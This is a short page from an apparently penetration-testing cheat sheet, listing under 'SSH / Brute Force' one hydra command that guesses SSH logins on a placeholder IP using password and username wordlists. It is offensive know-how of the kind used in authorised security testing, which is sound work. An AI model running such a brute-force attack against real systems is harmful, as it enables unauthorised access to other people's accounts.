> For the complete documentation index, see [llms.txt](https://heinosass.gitbook.io/leet-sheet/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://heinosass.gitbook.io/leet-sheet/network-hacking/ssh.md).

# SSH

## Brute Force

```
hydra IP_ADDRESS ssh -s 22 -P passwords.txt -L users.txt -e nsr -t 4
```
